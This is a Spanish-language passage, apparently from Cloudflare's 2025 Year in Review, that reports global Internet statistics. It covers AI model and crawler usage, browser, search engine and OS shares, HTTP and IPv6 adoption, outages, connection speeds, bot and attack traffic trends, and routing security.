A lo largo del año, el modelo llama-3-8b-instruct de Meta fue dominante, con una cuota de cuentas (36,3 %) más de tres veces superior a la de los siguientes modelos más populares, whisper de OpenAI (10,1 %) y stable-diffusion-xl-base-1.0 de Stability AI (9,8 %). Tanto Meta como la Academia de Inteligencia Artificial de Pekín (BAAI) tenían varios modelos entre los 10 primeros, y los 10 modelos principales tenían una cuota del 89 %, mientras que el resto se repartía entre una larga lista de otros modelos.

^{Modelos más populares en Workers AI en 2025, a nivel mundial}

La popularidad de las tareas se vio impulsada en gran medida por los modelos más destacados. La generación de texto, la conversión de texto a imagen y el reconocimiento automático de voz encabezaron la lista. La generación de texto fue utilizada por el 48,2 % de las cuentas de clientes de Workers AI, casi cuatro veces más que el porcentaje de texto a imagen, que fue del 12,3 %, y el porcentaje de reconocimiento automático de voz, que fue del 11,0 %. 

^{Tareas más populares en Workers AI en 2025, a nivel mundial}

Además del análisis anual presentado anteriormente, a continuación se muestran análisis puntuales de lo que se está rastreando. Ten en cuenta que estos datos no se incluyen en el micrositio del Resumen del año.

En la sección de IA del informe, analizamos el tráfico global de bots y rastreadores de IA, independientemente de la ubicación geográfica asociada a la cuenta propietaria del contenido rastreado. Si analizamos más detalladamente los datos geográficos de octubre de 2025 y observamos qué bots generan más tráfico de rastreo para los sitios web de clientes con una dirección de facturación en una región geográfica determinada, vemos que Googlebot representa entre el 35 % y el 55 % del tráfico de rastreo en cada región.

GPTBot de OpenAI o Bingbot de Microsoft son los segundos más activos, con porcentajes de rastreo del 13-14 %. En las economías desarrolladas de Norteamérica, Europa y Oceanía, Bingbot mantiene una clara ventaja sobre los rastreadores de IA. Sin embargo, para los sitios web ubicados en mercados de rápido crecimiento en Sudamérica y Asia, GPTBot aventaja ligeramente a Bingbot.

Tras analizar la actividad de los rastreadores de IA por sector de clientes durante octubre de 2025, descubrimos que los sectores de comercio minorista y software informático fueron los que atrajeron sistemáticamente la mayor parte del tráfico de rastreadores de IA, representando en conjunto algo más del 40 % de toda la actividad.

Otros que ocuparon las diez primeras posiciones representaron proporciones mucho menores de la actividad de rastreo. Estos 10 principales sectores representaron algo menos del 70 % del rastreo, y el resto se distribuyó entre una larga lista de otros sectores.

^{Cuota de la actividad de rastreo de IA en el sector, octubre de 2025}

Los dos principales sistemas operativos para dispositivos móviles a nivel mundial son iOS de Apple y Android de Google. Tras analizar la información en el encabezado User-Agent incluido en cada solicitud web, podemos calcular la distribución del tráfico por sistema operativo del cliente a lo largo del año. Los dispositivos Android generan la mayor parte del tráfico de dispositivos móviles a nivel mundial, debido a la amplia distribución de precios, formatos y capacidades de dichos dispositivos.

A nivel mundial, la cuota de tráfico procedente de iOS aumentó ligeramente en términos interanuales, en concreto dos puntos porcentuales hasta el 35 % en 2025. Si nos fijamos en los países con mayor cuota de tráfico iOS, Mónaco ocupaba el primer puesto, con un 70 %, e iOS generaba el 50 % o más del tráfico de dispositivos móviles en un total de 30 países / regiones, entre ellos Dinamarca (65 %), Japón (57 %) y Puerto Rico (52 %).

^{Distribución del tráfico de dispositivos móviles por sistema operativo en 2025, a nivel mundial}

En los países o regiones con mayor uso de Android, las cuotas fueron significativamente mayores. Veintisiete países registraron una adopción de Android superior al 90 % en 2025, siendo Papúa Nueva Guinea el país con la cuota más alta del 97 %. Sudán, Malawi, Bangladés y Etiopía también registraron una cuota de Android del 95 % o más. Android fue responsable del 50 % o más del tráfico de dispositivos móviles en 175 países / regiones, siendo las Bahamas, con un porcentaje del 51 %, el país con la cuota más baja de la lista. 

^{Distribución del uso de iOS y Android en 2025}

HTTP (protocolo de transferencia de hipertexto) es el protocolo que hace que la web funcione. En los últimos 30 años, ha experimentado varias revisiones importantes. La primera versión estandarizada, HTTP/1.0, se adoptó en 1996, HTTP/1.1 en 1999 y HTTP/2 en 2015. HTTP/3, estandarizado en 2022, supuso una importante actualización, ya que se ejecuta sobre un nuevo protocolo de transporte conocido como QUIC. El uso de QUIC como su transporte subyacente permite que HTTP/3 establezca conexiones más rápidamente, además de ofrecer un rendimiento mejorado al mitigar los efectos de la pérdida de paquetes y los cambios en la red. Dado que también proporciona cifrado de forma predeterminada, el uso de HTTP/3 mitiga el riesgo de ataques. 

A nivel mundial en 2025, el 50 % de las solicitudes a Cloudflare se realizaron a través de HTTP/2 y HTTP/1.x. Representaron el 29 %, y el 21 % restante se realizaron a través de HTTP/3. Estas cuotas se han mantenido prácticamente sin cambios desde 2024: HTTP/2 y HTTP/3 solo han ganado unas décimas de punto porcentual este año.

^{Distribución del tráfico por versión de HTTP en 2025, a nivel mundial}

Geográficamente, el uso de HTTP/3 parece estar aumentando y extendiéndose. El año pasado, observamos que habíamos encontrado ocho países / regiones que enviaban más de un tercio de sus solicitudes a través de HTTP/3. En 2025, 15 países / regiones enviaron más de un tercio de las solicitudes a través de HTTP/3. La adopción en Georgia, con un 38 %, superó por poco la tasa máxima de adopción de 2024 del 37% registrada en Reunión. (Si observamos los datos históricos, Georgia comenzó el año con una adopción de HTTP/3 de alrededor del 46 %, pero disminuyó durante la primera mitad del año antes de estabilizarse). Armenia experimentó el mayor aumento en la adopción de HTTP/3 interanual, con un incremento del 25 % al 37 %. 

Siete países / regiones registraron niveles generales de uso de HTTP/3 inferiores al 10 % debido a los altos niveles de tráfico HTTP/1.x originado por bots. Entre ellos se incluyen Hong Kong, Dominica, Singapur, Irlanda, Irán, Seychelles y Gibraltar. 

Para ofrecer un sitio web moderno, los desarrolladores deben integrar de forma eficiente una creciente colección de bibliotecas y marcos con herramientas y plataformas de terceros. Todos estos componentes deben funcionar en conjunto para garantizar experiencias de usuario eficaces, con numerosas funciones y sin problemas. Como en años anteriores, utilizamos URL Scanner de Cloudflare Radar para analizar los sitios web asociados con los 5000 dominios principales para identificar las tecnologías y los servicios más populares utilizados en once categorías. 

jQuery se describe a sí misma como una biblioteca JavaScript rápida, pequeña y con muchas funciones. Nuestro análisis reveló que se encuentra en 8 veces más sitios que Slick, una biblioteca JavaScript que se utiliza para mostrar carruseles de imágenes. React siguió siendo el principal marco de JavaScript utilizado para crear interfaces web, presente en el doble de sitios analizados que Vue.js. PHP, Node.js y Java siguieron siendo los lenguajes / tecnologías de programación más populares, manteniendo una clara ventaja sobre otros lenguajes como Ruby, Python, Perl y C.

^{Principales tecnologías de sitios web, categoría de bibliotecas de JavaScript en 2025}

WordPress siguió siendo el sistema de gestión de contenido (CMS) más popular, aunque su cuota de sitios web analizados se redujo al 47 %, y la diferencia se distribuyó entre los avances registrados por varios competidores. HubSpot y Marketo siguieron siendo las principales plataformas de automatización de marketing, con una cuota combinada un 10 % superior en términos interanuales. Entre las herramientas de pruebas A/B, la cuota de VWO creció ocho puntos porcentuales respecto al año anterior, ampliando su ventaja sobre Optimizely, mientras que Google Optimize, que se eliminó en septiembre de 2023, vio caer su cuota del 14 % al 4 %.

Las interfaces de programación de aplicaciones (API) son la base de los sitios web dinámicos modernos y de las aplicaciones web y nativas. Estos sitios y aplicaciones dependen en gran medida de las llamadas API automatizadas para proporcionar información personalizada. Mediante el análisis del tráfico web protegido y entregado por Cloudflare, podemos identificar las solicitudes que se realizan a los puntos finales de la API. Mediante la aplicación de heurística a estas solicitudes relacionadas con API que se ha determinado que no proceden de una persona que utiliza un navegador o una aplicación móvil nativa, podemos identificar los principales lenguajes utilizados para crear clientes API.

En 2025, el 20 % de las llamadas API automatizadas fueron realizadas por clientes basados en Go, lo que representa un crecimiento significativo con respecto al 12 % de la cuota de Go en 2024. La cuota de Python también aumentó interanualmente, del 9,6 % al 17 %. Java saltó al tercer lugar, alcanzando una cuota del 11,2 %, frente al 7,4 % en 2024. Node.js, el segundo lenguaje más popular el año pasado, vio cómo su cuota caía hasta el 8,3 % en 2025, lo que la relegó al cuarto puesto, mientras que .NET se mantuvo en el último lugar de los cinco primeros, con una caída hasta el 2,3 %.

^{Lenguajes de clientes API automatizados más populares en 2025}

Cloudflare se encuentra en una posición única para medir la cuota de mercado de los motores de búsqueda, ya que protegemos sitios web y aplicaciones para millones de clientes. Con ese fin, desde el cuarto trimestre de 2021, hemos estado publicando informes trimestrales sobre estos datos. Utilizamos el encabezado HTTP referer para identificar el motor de búsqueda que envía tráfico a los sitios y aplicaciones de los clientes, y presentamos los datos de cuota de mercado como un agregado global, así como desglosados por tipo de dispositivo y sistema operativo. (La información sobre el tipo de dispositivo y el sistema operativo se basa en los encabezados de solicitud HTTP User-Agent y Client Hints).

A nivel mundial, Google dirigió la mayor parte del tráfico a sitios protegidos y entregados por Cloudflare, con una cuota de casi el 90 % en 2025. Los otros motores de búsqueda entre los 5 principales son Bing (3,1 %), Yandex (2 %), Baidu (1,4 %) y DuckDuckGo (1,2 %). Si observamos las tendencias a lo largo del año, Yandex cayó del 2,5 % en mayo al 1,5 % en julio, mientras que Baidu creció del 0,9 % en abril al 1,6 % en junio.

^{Cuota de mercado global de los motores de búsqueda en 2025, a nivel mundial}

Los usuarios de Yandex se encuentran principalmente en Rusia, donde la plataforma nacional tiene una cuota de mercado del 65 %, casi el doble que la de Google, que es del 34 %. En la República Checa, los usuarios prefieren Google (84 %), pero la cuota del 7,7 % del motor de búsqueda local Seznam es un resultado sólido en comparación con los motores de búsqueda que ocupan el segundo lugar en otros países. 

^{Cuota de mercado global de los motores de búsqueda en 2025 | República Checa}

Para el tráfico de sistemas de "escritorio" agregados globalmente, la cuota de mercado de Google desciende a cerca del 80 %, mientras que la de Bing aumenta a casi el 11 %. Probablemente, esto se deba al continuo dominio del mercado por parte de los sistemas basados en Windows: en Windows, Google remite solo el 76 % del tráfico, mientras que Bing remite alrededor del 14 %. En cuanto al tráfico de dispositivos móviles, Google posee casi el 93 % de la cuota de mercado, siendo esta cuota la misma para el tráfico procedente de dispositivos Android y iOS.

^{Cuota de mercado global de los motores de búsqueda en 2025, sistemas basados en Windows}

Para obtener más información, que incluye motores de búsqueda combinados en "Otros", consulta los informes trimestrales de referencia de motores de búsqueda en Cloudflare Radar.

Cloudflare también se encuentra en una posición única para medir la cuota de mercado de navegadores, y llevamos varios años publicando informes trimestrales sobre el tema. Para identificar el navegador y el sistema operativo asociado que realiza las solicitudes de contenido, utilizamos información de los encabezados HTTP User-Agent y Client Hints. Presentamos los datos sobre la cuota de mercado de los navegadores tanto de forma combinada como desglosados por tipo de dispositivo y sistema operativo. Ten en cuenta que las cuotas de mercado de los navegadores disponibles tanto en ordenadores de sobremesa como en dispositivos móviles, como Google Chrome o Apple Safari, se presentan de forma agregada.

A nivel mundial, dos tercios del tráfico de solicitudes a Cloudflare provinieron de Chrome en 2025, un porcentaje similar al del año anterior. Safari, disponible exclusivamente en dispositivos Apple, fue el segundo navegador más popular, con una cuota de mercado del 15,4 %. Les siguieron Microsoft Edge (7,4 %), Mozilla Firefox (3,7 %) y Samsung Internet (2,3 %). 

^{Cuota de mercado de los navegadores en 2025, a nivel mundial}

En Rusia, Chrome sigue siendo el más popular, con una cuota del 44 %, pero el navegador nacional Yandex ocupa el segundo lugar con una cuota de mercado del 33 %, en comparación con las cuotas inferiores al 10 % de Safari, Edge y Opera. Curiosamente, el navegador Yandex superó a Chrome en un punto porcentual (39 % frente a 38 %) en junio, antes de ceder una cuota de mercado significativa a Chrome a medida que avanzaba el año.

^{Cuota de mercado global de los navegadores en 2025 | Rusia}

Como navegador predeterminado en iOS, Safari es, con diferencia, el navegador más popular en estos dispositivos, con una cuota de mercado del 79 %, cuatro veces la cuota del 19 % de Chrome. Menos del 1 % de las solicitudes proceden de DuckDuckGo, Firefox y QQ Browser (desarrollado en China por Tencent). Por el contrario, en Android, el 85 % de las solicitudes proceden de Chrome, mientras que el navegador Samsung Internet, proporcionado por el proveedor, ocupa un alejado segundo lugar con una cuota del 6,6 %. Huawei Browser, otro navegador proporcionado por el proveedor, ocupa el tercer lugar con solo un 1 %. Y a pesar de ser el navegador predeterminado en Windows, la cuota del 19 % de Edge es insignificante en comparación con Chrome, que lidera con una cuota del 69 % en ese sistema operativo.

^{Cuota de mercado global de navegadores en 2025 para dispositivos iOS}

Para obtener más información, incluidos los navegadores agrupados en "Otros", consulta los informes trimestrales sobre la cuota del mercado de los navegadores en Cloudflare Radar.

Las interrupciones de Internet siguen siendo una amenaza constante, y el impacto potencial de estas interrupciones continúa creciendo, ya que pueden provocar pérdidas económicas, interrumpir servicios educativos y gubernamentales, y limitar las comunicaciones. Durante 2025, informamos sobre importantes interrupciones de Internet y sus causas asociadas en nuestras publicaciones trimestrales (primer, segundo, tercer trimestre), así como en publicaciones independientes que cubrían las principales interrupciones en Portugal, España y Afganistán. El Centro de interrupciones de Cloudflare Radar realiza un seguimiento de estas interrupciones de Internet y utiliza los datos de tráfico de Cloudflare para obtener información sobre su alcance y duración.

Casi la mitad de las interrupciones observadas este año estuvieron relacionadas con los cortes de Internet destinados a evitar que se hagan trampas en los exámenes académicos. Países como Irak, Siria y Sudán, entre otros, volvieron a implementar cortes regulares de varias horas durante varias semanas en los periodos de exámenes. Se llevaron a cabo otros cierres impuestos por el Gobierno en Libia y Tanzania como respuesta a las protestas y los disturbios civiles, mientras que en Afganistán, los talibanes ordenaron el cierre de la conectividad a Internet por fibra óptica en varias provincias como parte de una campaña para "prevenir la inmoralidad".

Los cortes de cable, que afectaron tanto a la infraestructura de fibra óptica submarina como doméstica, fueron también una de las principales causas de interrupciones de Internet en 2025. Estos cortes provocaron que los proveedores de red en países / regiones como Estados Unidos, Sudáfrica, Haití, Pakistán y Hong Kong experimentaran interrupciones del servicio que duraron desde varias horas hasta varios días. Otras interrupciones notables incluyen una causada por un incendio en un edificio de telecomunicaciones en El Cairo, Egipto, que interrumpió la conectividad a Internet de múltiples proveedores de servicios durante varios días, y otra en Jamaica, donde los daños causados por el huracán Melissa provocaron una disminución del tráfico de Internet desde la isla durante más de una semana.

En la línea de tiempo del micrositio Resumen del año, al pasar el cursor por encima de un punto se mostrará información sobre esa interrupción del servicio, y al hacer clic en él se accederá a información adicional.

^{En 2025, se observaron más de 170 interrupciones importantes de Internet en todo el mundo.}

El espacio de direcciones IPv4 disponible se ha agotado en gran medida desde hace una década o más, aunque soluciones como la traducción de direcciones de red (NAT) han permitido a los proveedores de red ampliar los limitados recursos IPv4. Esto ha servido en parte para ralentizar la adopción de IPv6, diseñado a mediados de la década de 1990 como protocolo sucesor de IPv4, y ofrece un espacio de direcciones ampliado destinado a mejorar la compatibilidad con el crecimiento previsto del número de dispositivos conectados a Internet.

Durante casi 15 años, Cloudflare también ha sido un defensor activo y vocal del IPv6, y ha lanzado soluciones como Automatic IPv6 Gateway en 2011, que permitió la compatibilidad gratuita con IPv6 para todos nuestros clientes, y la compatibilidad con IPv6 por defecto para todos nuestros clientes en 2014. En términos sencillos, la compatibilidad del lado del servidor es solo la mitad de lo que se necesita para impulsar la adopción de IPv6, ya que las conexiones de los usuarios finales también deben ser compatibles. Mediante la agregación y el análisis de la versión de IP utilizada para las solicitudes realizadas a Cloudflare a lo largo del año, podemos obtener información sobre la distribución del tráfico entre IPv6 e IPv4.

A nivel global, el 29 % de las solicitudes de contenido compatibles con IPv6 ("doble pila") se realizaron a través de IPv6, lo que supone un aumento de un punto porcentual con respecto al 28 % registrado en 2024. India volvió a encabezar la lista con una tasa de adopción de IPv6 del 67 %, seguida de solo otros tres países / regiones (Malasia, Arabia Saudí y Uruguay) que también realizaron más de la mitad de este tipo de solicitudes a través de IPv6, al igual que el año pasado. Algunas de los mayores aumentos se observaron en Belice, que pasó del 4,3 % al 24 % interanual, y Catar, donde la adopción casi se duplicó hasta alcanzar el 33 % en 2025. Por desgracia, algunos países / regiones siguen estando por detrás de los líderes, siendo 94 los que registraron tasas de adopción inferiores al 10 %, entre ellos Rusia (8,6 %), Irlanda (6,5 %) y Hong Kong (3 %). Aún más rezagados están los 20 países / regiones con tasas de adopción inferiores al 1 %, tales como Tanzania (0,9 %), Siria (0,3 %) y Gibraltar (0,1 %).

^{Distribución del tráfico por versión de IP en 2025, a nivel mundial}

^{Los cinco países con mayor adopción de IPv6 en 2025}

Durante la última década, hemos recurrido a las pruebas de velocidad de Internet para muchos fines: garantizar la honestidad de nuestros proveedores de servicios, solucionar problemas de conexión o presumir de una velocidad de descarga especialmente alta en las redes sociales. De hecho, nos hemos acostumbrado a centrarnos en las velocidades de descarga como la principal medida de la calidad de una conexión. Si bien es una métrica absolutamente importante, para casos de uso cada vez más populares, como las videoconferencias, la transmisión en directo y los videojuegos en línea, también son fundamentales una buena velocidad de carga y una baja latencia. Sin embargo, incluso cuando los proveedores de Internet ofrecen niveles de servicio que incluyen altas velocidades simétricas y una latencia más baja, la adopción por parte de los consumidores suele ser variable debido al coste, la disponibilidad u otros problemas.

Las pruebas en speed.cloudflare.com miden las velocidades de carga y descarga, así como la latencia en carga y descarga. Mediante la agregación de los resultados de las pruebas realizadas en todo el mundo durante 2025, podemos obtener una perspectiva por país/región de los valores medios de estas métricas de calidad de conexión, así como información sobre la distribución de las mediciones.

En 2025, Europa estuvo bien representada entre los países con las velocidades medias de descarga más altas. España, Hungría, Portugal, Dinamarca, Rumanía y Francia se situaron entre los 10 primeros puestos, con velocidades medias de descarga superiores a 300 MB/s tanto en España como en Hungría. La media de España creció 25 MB/s desde 2024, mientras que la de Hungría aumentó 46 MB/s. Por su parte, los países asiáticos registraron muchas de las velocidades medias de subida más altas, situándose Corea del Sur, Macao, Singapur y Japón, entre los 10 primeros puestos, todos ellos con medias superiores a los 130 MB/s.

Sin embargo, España también encabezó la lista en la métrica de carga, con 206 MB/s, un aumento de 13 MB/s con respecto a 2024. El buen resultado del país en ambas métricas de velocidad es potencialmente atribuible a "UNICO-Broadband", una "convocatoria de proyectos de operadores de telecomunicaciones con el objetivo de desplegar infraestructura de banda ancha de alta velocidad capaz de proporcionar servicios a velocidades simétricas de al menos 300 MB/s, escalable a 1 GB/s", cuyo objetivo es dar cobertura al 100 % de la población en 2025.

^{Países / regiones con las velocidades de descarga más altas en 2025, a nivel mundial}

Como se ha señalado anteriormente, se necesitan conexiones de baja latencia para proporcionar a los usuarios experiencias de videojuegos y videoconferencia / streaming eficaces. La métrica de latencia se puede dividir en latencia con carga y latencia en reposo. La primera mide la latencia en una conexión con carga, en la que se consume activamente el ancho de banda, mientras que la segunda mide la latencia en una conexión "en reposo", cuando no hay otro tráfico de red presente. (Estas definiciones corresponden a la perspectiva de la aplicación de prueba de velocidad). 

En 2025, varios países europeos se encontraban entre los países con las latencias más bajas, tanto en reposo como con carga. En cuanto a la latencia media en reposo, Islandia midió la latencia más baja con 13 m/s, solo 2 m/s mejor que Moldavia. Además de estos dos, Portugal, España y Hungría también se situaron entre los 10 primeros, todos ellos con latencias medias en reposo inferiores a 20 m/s. Moldavia encabezó la lista de países / regiones con la latencia media de carga más baja, con 73 m/s. Hungría, España, Bélgica, Portugal, Eslovaquia y Eslovenia también se situaron en los 10 primeros puestos, todos ellos con latencias medias de carga inferiores a 100 m/s.

^{Latencia con carga/en reposo medida | Moldavia}

Como comentamos anteriormente, la prueba de velocidad en speed.cloudflare.com mide las velocidades de conexión y la latencia de un usuario. Revisamos los resultados agregados de esas pruebas, destacando los países / regiones con los mejores resultados. Sin embargo, también nos preguntamos acerca de la actividad de pruebas en todo el mundo: ¿dónde se preocupan más los usuarios por la calidad de su conexión y con qué frecuencia realizan pruebas? Una nueva visualización animada del Resumen del año ilustra la actividad de las pruebas de velocidad, agregada semanalmente.

Los datos se agregan a nivel regional y la actividad asociada se representa en el mapa, con círculos cuyo tamaño se basa en el número de pruebas realizadas cada semana. Ten en cuenta que las ubicaciones con menos de 100 pruebas de velocidad semanales no se representan. En cuanto al volumen de pruebas a lo largo del año, las áreas metropolitanas de Londres y Los Ángeles fueron las más activas, al igual que Tokio, Hong Kong y varias ciudades de Estados Unidos.

Si animamos el gráfico para ver los cambios a lo largo del año, se observan varios aumentos semanales en el volumen de pruebas. Entre ellos se incluyen los registrados en la zona de Nairobi (Kenia) durante el periodo de siete días que finalizó el 10 de junio, en la zona de Teherán (Irán) durante el periodo que finalizó el 29 de julio, en varias zonas de Rusia durante el periodo que finalizó el 5 de agosto, y en la zona de Karnataka (India) durante el periodo que finalizó el 28 de octubre. No está claro qué impulsó estos aumentos en el volumen de pruebas. El Centro de interrupciones de Cloudflare Radar no muestra ninguna interrupción de Internet observada que haya afectado a esas zonas en ese momento, por lo que es poco probable que se trate de suscriptores que estén probando el restablecimiento de la conectividad.

^{Actividad de pruebas de velocidad de Cloudflare por ubicación en 2025}

Para bien o para mal, en el último cuarto de siglo, los dispositivos móviles se han convertido en una parte indispensable de la vida cotidiana. La adopción varía en todo el mundo: las estadísticas del Banco Mundial muestran que, a octubre de 2025, varios países y regiones tienen una tasa de propiedad de teléfonos móviles superior al 90 %, mientras que en otros la tasa es inferior al 10 %. En algunos países / regiones, los dispositivos móviles se conectan principalmente a Internet a través de wifi, mientras que en otros países / regiones se da prioridad a los dispositivos móviles, donde los servicios 4G / 5G son el principal medio de acceso a Internet.

La información contenida en el encabezado User-Agent incluido en cada solicitud a Cloudflare nos permite clasificarla como procedente de un dispositivo móvil, de escritorio u otro tipo de dispositivo. La agregación de esta categorización a nivel mundial en 2025 reveló que el 43 % de las solicitudes procedían de dispositivos móviles, frente al 41 % en 2024. El resto provenía de dispositivos de tipo portátil y de escritorio “clásicos”. Al igual que en una observación realizada el año pasado, estas cuotas de tráfico coincidían con las medidas en los informes de Resumen del año que se remontan a 2022, lo que sugiere que el uso de dispositivos móviles ha alcanzado un "estado estable".

En 117 países / regiones, más de la mitad de las solicitudes procedían de dispositivos móviles, lideradas por Sudán y Malaui, con un 75 % y un 74 % respectivamente. Otros cinco países / regiones africanos — Esuatini (Suazilandia), Yemen, Botsuana, Mozambique y Somalia — también registraron porcentajes de solicitudes móviles superiores al 70 % en 2025, en consonancia con la elevada tasa de propiedad de teléfonos móviles en la región. Entre los países / regiones con una baja cuota de tráfico de dispositivos móviles, Gibraltar fue el único que se situó por debajo del 10 % (con un 5,1 %), y solo otros seis registraron menos de una cuarta parte de las solicitudes procedentes de dispositivos móviles. Esta cifra es inferior a la de 2024, cuando una docena de países / regiones tenía una cuota móvil inferior al 25 %.

^{Distribución del tráfico por tipo de dispositivo en 2025, a nivel mundial}

^{Distribución global del tráfico por tipo de dispositivo en 2025}

Cloudflare mitiga automáticamente el tráfico de ataque dirigido a sitios web y aplicaciones de clientes mediante técnicas de mitigación de DDoS o reglas gestionadas del firewall de aplicaciones web (WAF), protegiéndolos de diversas amenazas planteadas por los ciberdelincuentes. También permitimos a los clientes mitigar el tráfico, incluso si no es malicioso, utilizando técnicas como la limitación de velocidad de las solicitudes o el bloqueo de todo el tráfico desde una ubicación determinada. La necesidad de hacerlo puede deberse a requisitos normativos o empresariales. Analizamos la proporción total del tráfico hacia la red de Cloudflare a lo largo de 2025 que se mitigó por cualquier motivo, así como la proporción que se bloqueó como ataque DDoS o mediante reglas gestionadas por el WAF.

Este año, se mitigó el 6,2 % del tráfico global, un cuarto de punto porcentual menos que en 2024. El 3,3 % del tráfico se mitigó como parte de un ataque DDoS o mediante reglas gestionadas, lo que supone un aumento de una décima de punto porcentual con respecto al año anterior. Se aplicaron mitigaciones generales a más del 10 % del tráfico procedente de más de 30 países / regiones, mientras que en 14 países / regiones se aplicaron mitigaciones DDoS / WAF a más del 10 % del tráfico originado. Ambos recuentos disminuyeron en comparación con 2024. 

Guinea Ecuatorial fue el país con mayor porcentaje de tráfico mitigado, ya que el 40 % se mitigó de forma general y el 29 % se mitigó con medidas DDoS / WAF. Estas cuotas crecieron durante el último año, pasando del 26 % (general) y el 19 % (DDoS / WAF). Por el contrario, Dominica tuvo las proporciones más bajas de tráfico mitigado, solo el 0,7 %, y las mitigaciones DDoS / WAF se aplicaron solo al 0,1 %.

El gran aumento en el tráfico mitigado observado durante julio en el gráfico a continuación se debe a una campaña de ataques DDoS de gran envergadura que se dirigió principalmente a un único dominio de cliente de Cloudflare.

^{Tendencias del tráfico mitigado en 2025, a nivel mundial}

Un bot es una aplicación de software programada para realizar determinadas tareas, y Cloudflare utiliza heurística avanzada para diferenciar entre el tráfico de bots y el tráfico humano, puntuando cada solicitud según la probabilidad de que se origine en un bot o en un usuario humano. Mediante el control de tráfico que se sospecha que proviene de bots, los propietarios de sitios y aplicaciones pueden detectar y, si es necesario, bloquear actividades potencialmente maliciosas. Sin embargo, no todos los bots son maliciosos — los bots también pueden ser útiles, y Cloudflare mantiene un directorio de bots verificados que incluye los que se utilizan para cosas como la indexación de motores de búsqueda, el análisis de seguridad y el monitoreo de sitios / aplicaciones. Independientemente de la intención, analizamos de dónde se originaba el tráfico de bots en 2025, utilizando la dirección IP de una solicitud para identificar la red (sistema autónomo) y el país / región asociados al bot que realizaba la solicitud. 

A nivel mundial, los 10 principales países / regiones representaron el 71 % del tráfico de bots observado. El 40 % procedía de Estados Unidos, muy por encima del 6,5 % de Alemania. La cuota de Estados Unidos aumentó más de cinco puntos porcentuales desde 2024, mientras que la cuota de Alemania disminuyó una fracción de punto porcentual. El resto de países de entre los diez primeros contribuyeron con un porcentaje de tráfico de bots inferior al 5 % en 2025.

^{Distribución global del tráfico de bots por país / región de origen en 2025}

Si analizamos el tráfico de bots por red, observamos que las plataformas en la nube siguieron siendo una de los principales orígenes. Esto se debe a varios factores, entre los que se incluyen la facilidad de uso de herramientas automatizadas para aprovisionar rápidamente recursos informáticos, su coste relativamente bajo, su amplia distribución geográfica y la conectividad a Internet de gran ancho de banda de las plataformas. 

Dos sistemas autónomos asociados con Amazon Web Services representaron un total del 14,4 % del tráfico de bots observado, y dos sistemas autónomos asociados con Google Cloud fueron responsables de un 9,7 % del tráfico de bots. Les siguió Microsoft Azure, que originó el 5,5 % del tráfico de bots. Las cuotas de las tres plataformas aumentaron en comparación con 2024. Estas plataformas en la nube tienen una fuerte presencia regional en centros de datos en muchos de los países / regiones que figuran entre los 10 primeros. En otros lugares del mundo, los proveedores locales de telecomunicaciones representaban con frecuencia la mayor parte del tráfico de bots automatizado que se observaba en esos países o regiones.

^{Distribución global del tráfico de bots por red de origen en 2025}

Los atacantes cambian constantemente sus tácticas y objetivos, combinando diferentes elementos para intentar evadir la detección o en función del daño que pretenden causar. Pueden intentar causar daños financieros a empresas atacando sitios de comercio electrónico durante periodos de alta actividad comercial, hacer declaraciones políticas atacando sitios relacionados con el gobierno o la sociedad civil, o intentar dejar fuera de combate a sus oponentes atacando un servidor de videojuegos. Para identificar la actividad de los ataques a las industrias objetivo durante 2025, analizamos el tráfico mitigado de clientes que tenían una industria asociada y vertical en su registro de clientes. El tráfico mitigado se agregaba semanalmente por país / región de origen en 17 sectores verticales objetivo.

Las organizaciones del sector "Personas y sociedad" fueron las más afectadas durante el año, ya que el 4,4 % del tráfico mitigado a nivel mundial se dirigió a este sector. Los clientes clasificados como "Personas y sociedad" incluyen instituciones religiosas, organizaciones sin ánimo de lucro, organizaciones cívicas y sociales y bibliotecas. El sector comenzó el año con menos del 2 % del tráfico mitigado, pero vio cómo la cuota aumentaba hasta el 10 % la semana del 5 de marzo y superaba el 17 % a finales de mes. Otros picos de ataques dirigidos a estos sitios se produjeron a finales de abril (hasta el 19,1 %) y principios de julio (hasta el 23,2 %). Muchos de estos tipos de organizaciones están protegidas por el proyecto Galileo de Cloudflare, y esta entrada de blog detalla los ataques y las amenazas que sufrieron en 2024 y 2025.

Las apuestas y los videojuegos, el sector más afectado el año pasado, registraron una caída interanual de más de la mitad en la proporción de ataques mitigados, hasta situarse en solo el 2,6 %. Aunque cabría esperar que los ataques dirigidos a sitios web de apuestas alcanzaran su punto álgido en torno a grandes eventos deportivos como la Super Bowl y la March Madness, esta tendencia no se hizo evidente, ya que la proporción de ataques alcanzó su punto máximo, un 6,5 %, la semana del 5 de marzo, un mes después de la Super Bowl y un par de semanas antes del inicio de la March Madness.

^{Cuota global de tráfico mitigado por sector vertical en 2025, vista resumida}

El protocolo BGP (Border Gateway Protocol) es el protocolo de enrutamiento central de Internet, que permite que el tráfico fluya entre el origen y el destino mediante la comunicación de rutas entre redes. Sin embargo, dado que se basa en la confianza entre redes conectadas, la información incorrecta compartida entre pares (ya sea de forma intencionada o no) puede enviar el tráfico al lugar equivocado, posiblemente a sistemas controlados por un atacante. Para solucionar este problema, se desarrolló la Infraestructura de Clave Pública de Recursos (RPKI) como método criptográfico para firmar registros que asocian un anuncio de ruta BGP con el número correcto del sistema autónomo de origen, con el fin de garantizar que la información compartida proviene originalmente de una red autorizada para hacerlo. Cloudflare ha sido un firme defensor de la seguridad del enrutamiento, entre otras cosas como participante fundador del programa MANRS CDN y Cloud Programme y mediante la provisión de una herramienta pública que permite a los usuarios comprobar si su proveedor de Internet ha implementado BGP de forma segura.

Analizamos los datos disponibles en la página de enrutamiento de Cloudflare Radar para determinar el porcentaje de rutas válidas de RPKI y cómo cambió ese porcentaje a lo largo de 2025, así como para determinar el porcentaje de espacio de direcciones IP cubierto por rutas válidas. Esta última métrica es digna de mención porque un anuncio de ruta que cubre una gran cantidad de espacio de direcciones IP (millones de direcciones IPv4) tiene un impacto potencial mayor que un anuncio que cubre un pequeño bloque de espacio de direcciones IP (cientos de direcciones IPv4).

